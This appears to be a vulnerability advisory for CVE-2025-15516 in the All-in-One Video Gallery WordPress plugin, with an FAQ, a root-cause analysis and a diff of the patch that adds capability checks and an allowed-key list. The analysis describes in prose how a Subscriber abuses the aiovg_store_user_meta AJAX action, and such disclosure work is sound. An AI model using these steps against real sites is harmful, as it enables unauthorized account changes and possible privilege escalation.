What is CVE-2025-15516?

CVE-2025-15516 is a security vulnerability in the All-in-One Video Gallery plugin for WordPress, affecting versions 4.1.0 to 4.6.4. It allows authenticated users with Subscriber-level access and above to update arbitrary user meta data due to a missing authorization check in the ajax_callback_store_user_meta() function.

How does the vulnerability work?

The vulnerability arises because the ajax_callback_store_user_meta() function does not verify if the authenticated user has the necessary capabilities to modify user meta. An attacker can send a POST request to the admin-ajax.php endpoint with specific parameters to change their own user meta data.

Who is affected by this vulnerability?

Any WordPress site using the All-in-One Video Gallery plugin versions 4.1.0 to 4.6.4 is at risk. Specifically, authenticated users with Subscriber-level roles can exploit this vulnerability to update their own user meta.

How can I check if my site is affected?

To determine if your site is affected, check the version of the All-in-One Video Gallery plugin installed. If it is between 4.1.0 and 4.6.4, your site is vulnerable and should be updated.

What is the severity level of this vulnerability?

CVE-2025-15516 has a CVSS score of 4.3, classified as Medium severity. This indicates that while the vulnerability requires authentication to exploit, it could lead to unauthorized changes that might affect site functionality or user privileges.

How can I fix this vulnerability?

To fix CVE-2025-15516, update the All-in-One Video Gallery plugin to version 4.7.1 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.

What are the potential risks of this vulnerability?

If exploited, attackers can modify their own user meta data, which may lead to privilege escalation or disruption of plugin functionality. This can result in unauthorized access to features or data that rely on user meta values.

What changes were made in the patch?

The patch for CVE-2025-15516 introduces capability checks to ensure only users with appropriate permissions can modify user meta. It also restricts the keys that can be modified and improves data sanitization.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to update their user meta. It illustrates the lack of capability checks that allows this unauthorized modification.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the All-in-One Video Gallery plugin until it can be updated. Additionally, review user roles and limit access to only those who require it.

Are there any other security best practices to follow?

In addition to updating plugins, regularly audit your WordPress site for vulnerabilities, use strong passwords, and implement security plugins that monitor for unauthorized changes. Keeping backups is also essential.

Where can I find more information about this vulnerability?

More details about CVE-2025-15516 can be found on the National Vulnerability Database (NVD) or the CVE Details website. Additionally, the plugin’s changelog may provide insights into security updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15516: All-in-One Video Gallery 4.1.0 – 4.6.4 – Missing Authorization to Authenticated (Subscriber+) Limited User Meta Update (all-in-one-video-gallery)

CVE ID CVE-2025-15516

Plugin all-in-one-video-gallery

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 4.6.4

Patched Version 4.7.1

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15516:
This vulnerability is a missing authorization flaw in the All-in-One Video Gallery WordPress plugin versions 4.1.0 through 4.6.4. The plugin’s ajax_callback_store_user_meta() function lacks proper capability checks, allowing authenticated attackers with Subscriber-level permissions to update arbitrary string-based user meta keys for their own accounts.

Atomic Edge research identifies the root cause in the ajax_callback_store_user_meta() function within /all-in-one-video-gallery/admin/admin.php. The vulnerable function (lines 1063-1076) processes POST parameters ‘key’ and ‘value’ without verifying the user’s capability to perform the operation. The function only checks for a valid user ID and non-empty parameters before calling update_user_meta(). This missing capability check violates WordPress security best practices for AJAX handlers.

Exploitation requires an authenticated attacker with any WordPress role (including Subscriber) to send a POST request to /wp-admin/admin-ajax.php with action=aiovg_store_user_meta. The attacker must include the security nonce (available to all authenticated users), a ‘key’ parameter containing the target user meta key name, and a ‘value’ parameter with the desired string value. The attack vector is limited to the attacker’s own user account but can modify any string-based meta key.

The patch adds three critical security controls. First, it inserts a capability check using current_user_can(‘manage_aiovg_options’) (line 1076). Second, it restricts allowed keys to a predefined whitelist containing only ‘aiovg_video_form_tour’ and ‘aiovg_automation_form_tour’ (lines 1079-1083). Third, it changes parameter sanitization from sanitize_text_field() to sanitize_key() for the key parameter (line 1078) and adds value validation (lines 1085-1089). These changes ensure only administrators can modify user meta through this endpoint.

Successful exploitation allows attackers to modify their own user meta data. While limited to self-modification, this could enable privilege escalation if other plugin components rely on specific user meta values for access control. Attackers could also disrupt plugin functionality by overwriting critical configuration values stored as user meta. The vulnerability has a CVSS score of 4.3 (Medium severity) due to the authentication requirement and self-modification limitation.

Differential between vulnerable and patched code

Code Diff

--- a/all-in-one-video-gallery/admin/admin.php
+++ b/all-in-one-video-gallery/admin/admin.php
@@ -753,6 +753,13 @@
 	public function enqueue_scripts( $hook ) {
 		global $post_type;

+		$post_id = 0;
+
+		$screen = get_current_screen();
+		if ( $screen && 'aiovg_videos' === $screen->post_type && ! empty( $_GET['post'] ) ) {
+			$post_id = absint( $_GET['post'] );
+		}
+
 		if (
 			( isset( $_GET['page'] ) && in_array( $_GET['page'], array( 'all-in-one-video-gallery', 'aiovg_settings', 'aiovg_import_export' ) ) ) ||
 			( in_array( $hook, array( 'post-new.php', 'post.php' ) ) && 'aiovg_videos' === $post_type ) ||
@@ -816,8 +823,9 @@
 			AIOVG_PLUGIN_SLUG . '-admin',
 			'aiovg_admin',
 			array(
-				'ajax_nonce' => wp_create_nonce( 'aiovg_ajax_nonce' ),
 				'site_url'   => get_site_url(),
+				'post_id'    => $post_id,
+				'ajax_nonce' => wp_create_nonce( 'aiovg_ajax_nonce' ),
 				'i18n'       => array(
 					'copied'             => __( 'Copied!', 'all-in-one-video-gallery' ),
 					'no_issues_selected' => __( 'Please select at least one issue.', 'all-in-one-video-gallery' ),
@@ -1063,14 +1071,28 @@
 		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );

 		$user_id = get_current_user_id();
-		$key     = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';
-		$value   = isset( $_POST['value'] ) ? sanitize_text_field( $_POST['value'] ) : '';
+		if ( ! $user_id ) {
+			wp_die();
+		}
+
+		if ( ! current_user_can( 'manage_aiovg_options' ) ) {
+			wp_die();
+		}
+
+		$key = isset( $_POST['key'] ) ? sanitize_key( $_POST['key'] ) : '';
+		$allowed_keys = array( 'aiovg_video_form_tour',	'aiovg_automation_form_tour' );
+
+		if ( ! in_array( $key, $allowed_keys ) ) {
+			wp_die();
+		}

-		if ( ! empty( $user_id ) && ! empty( $key ) ) {
-			update_user_meta( $user_id, $key, $value );
+		$value = isset( $_POST['value'] ) ? trim( $_POST['value'] ) : 0;
+		if ( 'completed' !== $value ) {
+			$value = (int) $value;
 		}

-		wp_die();
+		update_user_meta( $user_id, $key, $value );
+		wp_die();
 	}

 }
--- a/all-in-one-video-gallery/admin/import-export.php
+++ b/all-in-one-video-gallery/admin/import-export.php
@@ -86,6 +86,7 @@

 		// Sanitize options
 		$include_subfolders = isset( $_POST['include_subfolders'] ) ? (int) $_POST['include_subfolders'] : 0;
+		$slug_strategy      = isset( $_POST['slug_strategy'] ) ? sanitize_key( $_POST['slug_strategy'] ) : 'filename';
 		$set_featured_image = isset( $_POST['set_featured_image'] ) ? (int) $_POST['set_featured_image'] : 0;
 		$enable_downloads   = isset( $_POST['enable_downloads'] ) ? (int) $_POST['enable_downloads'] : 0;
 		$enable_comments    = isset( $_POST['enable_comments'] ) ? (int) $_POST['enable_comments'] : 0;
@@ -195,6 +196,7 @@

 		// Import videos
 		$imported_data = $this->import_videos_from_folder( $videos, array(
+			'slug_strategy'      => $slug_strategy,
 			'categories'         => $categories,
 			'tags'               => $tags,
 			'comment_status'     => ( ! empty( $enable_comments ) ? 'open' : 'closed' ),
@@ -1408,6 +1410,10 @@
 				'comment_status' => $attributes['comment_status']
 			);

+			if ( 'random' === $attributes['slug_strategy'] ) {
+				$args['post_name'] = $this->generate_random_video_slug( $video_src );
+			}
+
 			$post_id = wp_insert_post( $args );

 			// Insert post meta
@@ -2074,6 +2080,25 @@
 	}

 	/**
+	 * Generate a secure, deterministic video post slug.
+	 *
+	 * @since  4.7.0
+	 * @access private
+	 * @param  string  $video_src Absolute or relative video file path.
+	 * @return string
+	 */
+	private function generate_random_video_slug( $video_src ) {
+		// Normalize path for consistency across environments
+		$normalized = wp_normalize_path( $video_src );
+
+		// Add site-specific salt
+		$hash = hash( 'sha256', $normalized . '|' . wp_salt( 'aiovg_video_slug' ) );
+
+		// Short, URL-safe slug
+		return substr( $hash, 0, 18 );
+	}
+
+	/**
 	 * Resolve video type.
 	 *
 	 * @since  4.5.2
--- a/all-in-one-video-gallery/admin/partials/import-export.php
+++ b/all-in-one-video-gallery/admin/partials/import-export.php
@@ -107,6 +107,37 @@
                                 </p>
                             </div>

+                            <!-- Field: Video Page Slug -->
+                            <div class="aiovg-form-control">
+                                <label for="aiovg-slug_strategy" class="aiovg-form-label">
+                                    <?php esc_html_e( 'Video Page Slug', 'all-in-one-video-gallery' ); ?>
+                                </label>
+
+                                <select name="slug_strategy" id="aiovg-slug_strategy" class="widefat">
+                                    <?php
+                                    $options = array(
+                                        'filename' => __( 'Use File Name', 'all-in-one-video-gallery' ),
+                                        'random'   => __( 'Generate Secure Random Slug (Recommended)', 'all-in-one-video-gallery' )
+                                    );
+
+                                    $slug_strategy = ! empty( $restrictions_settings['enable_restrictions'] ) ? 'random' : 'filename';
+
+                                    foreach ( $options as $key => $label ) {
+                                        printf(
+                                            '<option value="%s"%s>%s</option>',
+                                            esc_attr( $key ),
+                                            selected( $slug_strategy, $key, false ),
+                                            esc_html( $label )
+                                        );
+                                    }
+                                    ?>
+                                </select>
+
+                                <p class="description">
+                                    <?php esc_html_e( 'Choose how the video page URL slug should be generated. Using a random slug helps prevent users from guessing direct video file URLs.', 'all-in-one-video-gallery' ); ?>
+                                </p>
+                            </div>
+
                             <!-- Field: Video Categories -->
                             <div class="aiovg-form-control">
                                 <label for="aiovg-categories" class="aiovg-form-label">
--- a/all-in-one-video-gallery/admin/partials/video-image.php
+++ b/all-in-one-video-gallery/admin/partials/video-image.php
@@ -14,6 +14,19 @@
 $image              = isset( $post_meta['image'] ) ? $post_meta['image'][0] : '';
 $image_alt          = isset( $post_meta['image_alt'] ) ? $post_meta['image_alt'][0] : '';
 $set_featured_image = isset( $post_meta['set_featured_image'] ) ? $post_meta['set_featured_image'][0] : 1;
+
+if ( ! empty( $image ) ) {
+	$is_image_uploaded = isset( $post_meta['is_image_uploaded'] ) ? (int) $post_meta['is_image_uploaded'][0] : 0;
+
+	if ( ! empty( $is_image_uploaded ) ) {
+		$private_base_url = aiovg_get_private_base_url();
+
+		// Mask the URL only if it is not already masked
+		if ( 0 !== strpos( $image, $private_base_url ) ) {
+			$image = $private_base_url .  aiovg_base64_encode( $image );
+		}
+	}
+}
 ?>

 <div class="aiovg-form-controls">
--- a/all-in-one-video-gallery/admin/partials/video-sources.php
+++ b/all-in-one-video-gallery/admin/partials/video-sources.php
@@ -33,6 +33,19 @@
 $embedcode     = isset( $post_meta['embedcode'] ) ? $post_meta['embedcode'][0] : '';
 $download      = isset( $post_meta['download'] ) ? $post_meta['download'][0] : 1;

+if ( ! empty( $mp4 ) ) {
+	$is_video_uploaded = isset( $post_meta['is_video_uploaded'] ) ? (int) $post_meta['is_video_uploaded'][0] : 0;
+
+	if ( ! empty( $is_video_uploaded ) ) {
+		$private_base_url = aiovg_get_private_base_url();
+
+		// Mask the URL only if it is not already masked
+		if ( 0 !== strpos( $mp4, $private_base_url ) ) {
+			$mp4 = $private_base_url .  aiovg_base64_encode( $mp4 );
+		}
+	}
+}
+
 $can_upload_to_bunny_stream = false;
 if ( aiovg_current_user_can( 'edit_aiovg_video', $post->ID ) ) {
 	$can_upload_to_bunny_stream = aiovg_has_bunny_stream_enabled();
--- a/all-in-one-video-gallery/admin/settings.php
+++ b/all-in-one-video-gallery/admin/settings.php
@@ -988,6 +988,17 @@
                 ),
 			),
             'aiovg_general_settings' => array(
+                array(
+                    'name'              => 'force_load_assets',
+                    'label'             => __( 'Force Load Plugin Assets', 'all-in-one-video-gallery' ),
+                    'description'       => __( 'Force-load the plugin's CSS and/or JavaScript files on all front-end pages. Enable this option only if layouts do not render correctly due to page builders or theme conflicts.', 'all-in-one-video-gallery' ),
+                    'type'              => 'multicheck',
+                    'options'           => array(
+                        'css' => __( 'Force load CSS (recommended)', 'all-in-one-video-gallery' ),
+                        'js'  => __( 'Force load JavaScript (advanced)', 'all-in-one-video-gallery' ),
+                    ),
+                    'sanitize_callback' => 'aiovg_sanitize_array'
+                ),
                 array(
                     'name'              => 'lazyloading',
                     'label'             => __( 'Lazyload Images / Videos', 'all-in-one-video-gallery' ),
--- a/all-in-one-video-gallery/admin/videos.php
+++ b/all-in-one-video-gallery/admin/videos.php
@@ -258,13 +258,37 @@
 				// OK to save meta data
 				$featured_images_settings = aiovg_get_option( 'aiovg_featured_images_settings' );

+				$private_base_url = aiovg_get_private_base_url();
+
 				$type = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : 'default';
 				update_post_meta( $post_id, 'type', $type );

-				$mp4 = isset( $_POST['mp4'] ) ? aiovg_sanitize_url( $_POST['mp4'] ) : '';
+				delete_post_meta( $post_id, 'is_video_uploaded' );
+
+				$mp4 = isset( $_POST['mp4'] ) ? trim( $_POST['mp4'] ) : '';
+
+				if ( ! empty( $mp4 ) ) {
+					// Check if the URL is a masked uploaded file
+					if ( 0 === strpos( $mp4, $private_base_url ) ) {
+						// Extract the encoded portion
+						$encoded = substr( $mp4, strlen( $private_base_url ) );
+
+						// Decode the masked URL
+						$decoded = aiovg_base64_decode( $encoded );
+
+						// Sanitize the real file URL
+						$mp4 = aiovg_sanitize_url( $decoded );
+
+						update_post_meta( $post_id, 'is_video_uploaded', 1 );
+					} else {
+						// Direct URL entered by the user
+						$mp4 = aiovg_sanitize_url( $mp4 );
+					}
+				}
+
 				update_post_meta( $post_id, 'mp4', $mp4 );
 				update_post_meta( $post_id, 'mp4_id', attachment_url_to_postid( $mp4 ) );
-
+
 				$has_webm = isset( $_POST['has_webm'] ) ? 1 : 0;
 				update_post_meta( $post_id, 'has_webm', $has_webm );

@@ -322,8 +346,22 @@
 				$facebook = isset( $_POST['facebook'] ) ? aiovg_sanitize_url( $_POST['facebook'] ) : '';
 				update_post_meta( $post_id, 'facebook', $facebook );

+				$embedcode = isset( $_POST['embedcode'] ) ? trim( wp_unslash( $_POST['embedcode'] ) ) : '';
+
+				if ( $embedcode && filter_var( $embedcode, FILTER_VALIDATE_URL ) ) {
+					$parsed = wp_parse_url( $embedcode );
+
+					// Allow only http / https URLs
+					if ( isset( $parsed['scheme'] ) && in_array( $parsed['scheme'], array( 'http', 'https' ) ) ) {
+						$embedcode = sprintf(
+							'<iframe src="%s" width="560" height="315" frameborder="0" scrolling="no" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>',
+							esc_url( $embedcode )
+						);
+					}
+				}
+
 				add_filter( 'wp_kses_allowed_html', 'aiovg_allow_iframe_script_tags' );
-				$embedcode = isset( $_POST['embedcode'] ) ? wp_kses_post( str_replace( "'", '"', $_POST['embedcode'] ) ) : '';
+				$embedcode = ! empty( $embedcode ) ? wp_kses_post( str_replace( "'", '"', $embedcode ) ) : '';
 				update_post_meta( $post_id, 'embedcode', $embedcode );
 				remove_filter( 'wp_kses_allowed_html', 'aiovg_allow_iframe_script_tags' );

@@ -360,11 +398,29 @@
 				update_post_meta( $post_id, 'download', $download );

 				// Poster Image
-				$image    = '';
+				delete_post_meta( $post_id, 'is_image_uploaded' );
+
+				$image    = isset( $_POST['image'] ) ? trim( $_POST['image'] ) : '';
 				$image_id = 0;

-				if ( ! empty( $_POST['image'] ) ) {
-					$image    = aiovg_sanitize_url( $_POST['image'] );
+				if ( ! empty( $image ) ) {
+					// Check if the URL is a masked uploaded file
+					if ( 0 === strpos( $image, $private_base_url ) ) {
+						// Extract the encoded portion
+						$encoded = substr( $image, strlen( $private_base_url ) );
+
+						// Decode the masked URL
+						$decoded = aiovg_base64_decode( $encoded );
+
+						// Sanitize the real file URL
+						$image = aiovg_sanitize_url( $decoded );
+
+						update_post_meta( $post_id, 'is_image_uploaded', 1 );
+					} else {
+						// Direct URL entered by the user
+						$image = aiovg_sanitize_url( $image );
+					}
+
 					$image_id = attachment_url_to_postid( $image );
 				} else {
 					if ( 'youtube' == $type && ! empty( $youtube ) ) {
--- a/all-in-one-video-gallery/all-in-one-video-gallery.php
+++ b/all-in-one-video-gallery/all-in-one-video-gallery.php
@@ -11,7 +11,7 @@
  * Plugin Name:     All-in-One Video Gallery
  * Plugin URI:      https://plugins360.com/all-in-one-video-gallery/
  * Description:     An ultimate video player and video gallery plugin – no coding required. Suitable for YouTubers, Video Bloggers, Course Creators, Podcasters, Sales & Marketing Professionals, and anyone using video on a website.
- * Version:         4.6.4
+ * Version:         4.7.1
  * Author:          Team Plugins360
  * Author URI:      https://plugins360.com
  * License:         GPL-2.0+
@@ -68,7 +68,7 @@
 }
 // The current version of the plugin
 if ( !defined( 'AIOVG_PLUGIN_VERSION' ) ) {
-    define( 'AIOVG_PLUGIN_VERSION', '4.6.4' );
+    define( 'AIOVG_PLUGIN_VERSION', '4.7.1' );
 }
 // The unique identifier of the plugin
 if ( !defined( 'AIOVG_PLUGIN_SLUG' ) ) {
--- a/all-in-one-video-gallery/includes/helpers/functions.php
+++ b/all-in-one-video-gallery/includes/helpers/functions.php
@@ -751,6 +751,12 @@
  * @return array $defaults Array of plugin settings.
  */
 function aiovg_get_default_settings() {
+	static $defaults = null;
+
+	if ( null !== $defaults ) {
+		return $defaults;
+	}
+
 	$video_page_slug = 'aiovg_videos';
 	$slugs = array( 'video', 'watch' );

@@ -815,7 +821,6 @@
 			'order'           => 'desc',
 			'thumbnail_style' => 'standard',
 			'display'         => array(
-				'count'    => 'count',
 				'title'    => 'title',
 				'category' => 'category',
 				'tag'      => 'tag',
@@ -895,9 +900,14 @@
 			'show_consent'         => 0,
 			'consent_message'      => __( '<strong>Please accept cookies to play this video</strong>. By accepting you will be accessing content from a service provided by an external third party.', 'all-in-one-video-gallery' ),
 			'consent_button_label' => __( 'I Agree', 'all-in-one-video-gallery' ),
-			'disable_cookies'      => array()
+			'disable_cookies'      => array(
+				'aiovg_rand_seed' => 'aiovg_rand_seed'
+			)
 		),
 		'aiovg_general_settings' => array(
+			'force_load_assets'         => array(
+				'css' => 'css'
+			),
 			'lazyloading'               => 0,
 			'datetime_format'           => '',
 			'number_format'             => 'full',
@@ -1264,6 +1274,16 @@
 }

 /**
+ * Returns the base URL used for private masked media.
+ *
+ * @since  4.7.0
+ * @return string
+ */
+function aiovg_get_private_base_url() {
+	return untrailingslashit( get_site_url() ) . '/private/';
+}
+
+/**
  * Get the sorting options for the search form.
  *
  * @since  3.8.4
@@ -2132,13 +2152,8 @@
  * @return string Unique ID.
  */
 function aiovg_get_uniqid() {
-	global $aiovg;
-
-	if ( ! isset( $aiovg['uniqid'] ) ) {
-		$aiovg['uniqid'] = 0;
-	}
-
-	return uniqid() . ++$aiovg['uniqid'];
+	static $counter = 0;
+	return uniqid() . ++$counter;
 }

 /**
@@ -2518,6 +2533,11 @@
  * @param int   $post_id Post ID
  */
 function aiovg_update_views_count( $post_id ) {
+	$can_update_views_count = apply_filters( 'aiovg_can_update_views_count', true, $post_id );
+	if ( ! $can_update_views_count ) {
+		return;
+	}
+
 	$privacy_settings = aiovg_get_option( 'aiovg_privacy_settings' );

 	if ( isset( $privacy_settings['disable_cookies'] ) && isset( $privacy_settings['disable_cookies']['aiovg_videos_views'] ) ) {
--- a/all-in-one-video-gallery/includes/helpers/render.php
+++ b/all-in-one-video-gallery/includes/helpers/render.php
@@ -281,7 +281,7 @@
 	wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 	if ( 'search' != $attributes['filters_mode'] ) {
-		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+		wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-search' );
 	}

 	if ( ! empty( $attributes['has_category'] ) || ! empty( $attributes['has_tag'] ) ) {
--- a/all-in-one-video-gallery/includes/init.php
+++ b/all-in-one-video-gallery/includes/init.php
@@ -260,6 +260,7 @@
 		$this->loader->add_action( 'init', $public, 'init' );
 		$this->loader->add_action( 'init', $public, 'register_styles' );
 		$this->loader->add_action( 'init', $public, 'register_scripts' );
+		$this->loader->add_action( 'wp_enqueue_scripts', $public, 'enqueue_assets', 99 );
 		$this->loader->add_action( 'aiovg_enqueue_block_editor_assets', $public, 'enqueue_block_editor_assets' );
 		$this->loader->add_action( 'elementor/editor/after_enqueue_scripts', $public, 'enqueue_block_editor_assets' );
 		$this->loader->add_action( 'elementor/preview/enqueue_scripts', $public, 'enqueue_block_editor_assets' );
@@ -370,11 +371,8 @@

 		$this->loader->add_action( 'aiovg_save_video', $bunny_stream, 'save_bunny_stream_data' );
 		$this->loader->add_action( 'wp_ajax_aiovg_create_bunny_stream_video', $bunny_stream, 'ajax_callback_create_bunny_stream_video' );
-		$this->loader->add_action( 'wp_ajax_nopriv_aiovg_create_bunny_stream_video', $bunny_stream, 'ajax_callback_create_bunny_stream_video' );
 		$this->loader->add_action( 'wp_ajax_aiovg_get_bunny_stream_video', $bunny_stream, 'ajax_callback_get_bunny_stream_video' );
-		$this->loader->add_action( 'wp_ajax_nopriv_aiovg_get_bunny_stream_video', $bunny_stream, 'ajax_callback_get_bunny_stream_video' );
 		$this->loader->add_action( 'wp_ajax_aiovg_delete_bunny_stream_video', $bunny_stream, 'ajax_callback_delete_bunny_stream_video' );
-		$this->loader->add_action( 'wp_ajax_nopriv_aiovg_delete_bunny_stream_video', $bunny_stream, 'ajax_callback_delete_bunny_stream_video' );
 		$this->loader->add_action( 'before_delete_post', $bunny_stream, 'before_delete_post', 1 );

 		$this->loader->add_filter( 'aiovg_get_image', $bunny_stream, 'filter_image_url', 10, 4 );
--- a/all-in-one-video-gallery/includes/player/popup.php
+++ b/all-in-one-video-gallery/includes/player/popup.php
@@ -55,11 +55,16 @@
 				$is_image = 1;
 			}
 		} else {
-			$popup_content = trim( $this->args['content'] );
+			$popup_content = trim( (string) $this->args['content'] );

-			if ( ! filter_var( $popup_content, FILTER_VALIDATE_URL ) === FALSE ) {
-				$popup_content = sprintf( '<img src="%s" alt="" %s/>', esc_url( $popup_content ), $lazyloading );
-				$is_image = 1;
+			if ( $popup_content && filter_var( $popup_content, FILTER_VALIDATE_URL ) ) {
+				$parsed = wp_parse_url( $popup_content );
+
+				// Allow only http / https URLs
+				if ( isset( $parsed['scheme'] ) && in_array( $parsed['scheme'], array( 'http', 'https' ) ) ) {
+					$popup_content = sprintf( '<img src="%s" alt="" %s/>', esc_url( $popup_content ), $lazyloading );
+					$is_image = 1;
+				}
 			}
 		}

--- a/all-in-one-video-gallery/includes/player/vidstack.php
+++ b/all-in-one-video-gallery/includes/player/vidstack.php
@@ -93,7 +93,7 @@
 			'post_id'     => $this->post_id,
 			'post_type'   => sanitize_text_field( $this->post_type ),
 			'ajax_url'    => sanitize_url( admin_url( 'admin-ajax.php' ) ),
-			'ajax_nonce'  => sanitize_text_field( wp_create_nonce( 'aiovg_ajax_nonce' ) ),
+			'ajax_nonce'  => wp_create_nonce( 'aiovg_public_ajax_nonce' ),
 			'lazyloading' => (int) $player_settings['lazyloading'],
 			'player'  => array(
 				'iconUrl' => AIOVG_PLUGIN_URL . 'vendor/vidstack/plyr.svg',
--- a/all-in-one-video-gallery/public/bunny-stream.php
+++ b/all-in-one-video-gallery/public/bunny-stream.php
@@ -66,7 +66,27 @@
 	 */
 	public function save_bunny_stream_data( $post_id ) {
 		$type = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : 'default';
-		$mp4  = isset( $_POST['mp4'] ) ? aiovg_sanitize_url( $_POST['mp4'] ) : '';
+		$mp4  = isset( $_POST['mp4'] ) ? trim( $_POST['mp4'] ) : '';
+
+		if ( ! empty( $mp4 ) ) {
+			$private_base_url = aiovg_get_private_base_url();
+
+			// Check if the URL is a masked uploaded file
+			if ( 0 === strpos( $mp4, $private_base_url ) ) {
+				// Extract the encoded portion
+				$encoded = substr( $mp4, strlen( $private_base_url ) );
+
+				// Decode the masked URL
+				$decoded = aiovg_base64_decode( $encoded );
+
+				// Sanitize the real file URL
+				$mp4 = aiovg_sanitize_url( $decoded );
+			} else {
+				// Direct URL entered by the user
+				$mp4 = aiovg_sanitize_url( $mp4 );
+			}
+		}
+
 		$bunny_stream_video_id = isset( $_POST['bunny_stream_video_id'] ) ? sanitize_text_field( $_POST['bunny_stream_video_id'] ) : 0;

 		if ( ! empty( $bunny_stream_video_id ) ) {
@@ -129,8 +149,34 @@
 	 * @since 4.2.0
 	 */
 	public function ajax_callback_create_bunny_stream_video() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' ); // Verify the nonce for security
+		// Verify nonce
+		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+
+		// Ensure user is logged in
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+		}
+
+		// Verify user capability
+		$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
+
+		if ( $post_id > 0 ) {
+			$post = get_post( $post_id );

+			if ( ! $post || 'aiovg_videos' !== $post->post_type ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+
+			if ( ! aiovg_current_user_can( 'edit_aiovg_video', $post_id ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		} else {
+			if ( ! aiovg_current_user_can( 'edit_aiovg_videos' ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		}
+
+		// Vars
 		$settings = aiovg_has_bunny_stream_enabled(); // Fetch Bunny Stream settings
 		$response = array();

@@ -210,8 +256,34 @@
 	 * @since 4.2.0
 	 */
 	public function ajax_callback_get_bunny_stream_video() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' ); // Verify the nonce for security
+		// Verify nonce
+		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+
+		// Ensure user is logged in
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+		}
+
+		// Verify user capability
+		$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
+
+		if ( $post_id > 0 ) {
+			$post = get_post( $post_id );

+			if ( ! $post || 'aiovg_videos' !== $post->post_type ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+
+			if ( ! aiovg_current_user_can( 'edit_aiovg_video', $post_id ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		} else {
+			if ( ! aiovg_current_user_can( 'edit_aiovg_videos' ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		}
+
+		// Vars
 		$settings = aiovg_has_bunny_stream_enabled(); // Fetch Bunny Stream API settings
 		$response = array();

@@ -283,8 +355,35 @@
 	 * @since 4.2.2
 	 */
 	public function ajax_callback_delete_bunny_stream_video() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' ); // Verify the nonce for security
+		// Verify nonce
+		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+
+		// Ensure user is logged in
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+		}
+
+		// Verify user capability
+		$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
+
+		if ( $post_id > 0 ) {
+			$post = get_post( $post_id );
+
+			if ( ! $post || 'aiovg_videos' !== $post->post_type ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+
+			if ( ! aiovg_current_user_can( 'delete_aiovg_video', $post_id ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		} else {
+			// If no post exists yet, this is a cancel-upload cleanup
+			if ( ! aiovg_current_user_can( 'edit_aiovg_videos' ) ) {
+				wp_send_json_error( __( 'You do not have sufficient permissions to do this action.', 'all-in-one-video-gallery' ) );
+			}
+		}

+		// Vars
 		$response = array();
 		$video_id = isset( $_POST['video_id'] ) ? sanitize_text_field( $_POST['video_id'] ) : '';

--- a/all-in-one-video-gallery/public/categories.php
+++ b/all-in-one-video-gallery/public/categories.php
@@ -47,7 +47,7 @@
 	 */
 	public function ajax_callback_load_categories() {
 		// Security check
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$json = array();
@@ -74,7 +74,7 @@
 		wp_enqueue_style( AIOVG_PLUGIN_SLUG . '-public' );

 		if ( 'dropdown' == $template ) {
-			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-public' );
+			wp_enqueue_script( AIOVG_PLUGIN_SLUG . '-categories' );
 		}

 		// Process output
--- a/all-in-one-video-gallery/public/likes.php
+++ b/all-in-one-video-gallery/public/likes.php
@@ -76,7 +76,7 @@
 	 * @since 3.6.1
 	 */
 	public function ajax_callback_get_likes_dislikes_info() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$response = array(
@@ -136,7 +136,7 @@
 	 * @since 3.6.1
 	 */
 	public function ajax_callback_toggle_likes() {
-		check_ajax_referer( 'aiovg_ajax_nonce', 'security' );
+		check_ajax_referer( 'aiovg_public_ajax_nonce', 'security' );

 		// Proceed safe
 		$response = array(
